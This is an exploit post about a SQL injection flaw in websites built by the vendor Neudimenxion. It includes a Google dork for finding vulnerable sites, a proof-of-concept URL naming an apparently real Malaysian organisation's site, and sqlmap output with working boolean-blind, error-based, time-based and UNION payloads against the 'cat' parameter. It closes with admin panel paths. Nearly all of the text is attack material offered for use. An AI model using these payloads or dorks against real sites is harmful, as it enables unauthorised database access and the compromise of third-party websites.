@ Title: Website by Neudimenxion SQLi @ Author: Informacion - Anonymous @ D0rk: intext:"Website by Neudimenxion" ext:php @ Date: 20.05.20 @ Vendor: www.neudimenxion.com @ Description: SQLi manually or automatize @ P0c: http://ogsm.org.my/event.php?cat=Local [SQLi] @ Debug SQLi: --- Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=Local' AND 3942=3942 AND 'aawY'='aawY Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cat=Local' AND (SELECT 2455 FROM(SELECT COUNT(*),CONCAT(0x717a707171,(SELECT (ELT(2455=2455,1))),0x716b6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CEie'='CEie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cat=Local' AND SLEEP(10) AND 'LjJr'='LjJr Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) Type: UNION query Title: MySQL UNION query (37) - 17 columns Payload: cat=Local' UNION ALL SELECT 37,37,CONCAT(0x717a707171,0x4a4d7447497577667953646c527a6864536c4963744e446d544b7a62526a64596f4d547856506c72,0x716b6a7a71),37,37,37,37,37,37,37,37,37,37,37,37,37,37# Vector: UNION ALL SELECT 37,37,[QUERY],37,37,37,37,37,37,37,37,37,37,37,37,37,37# --- @ Panels: - /admin_login.php/ - /_cmspanel/ @@ :) ############################################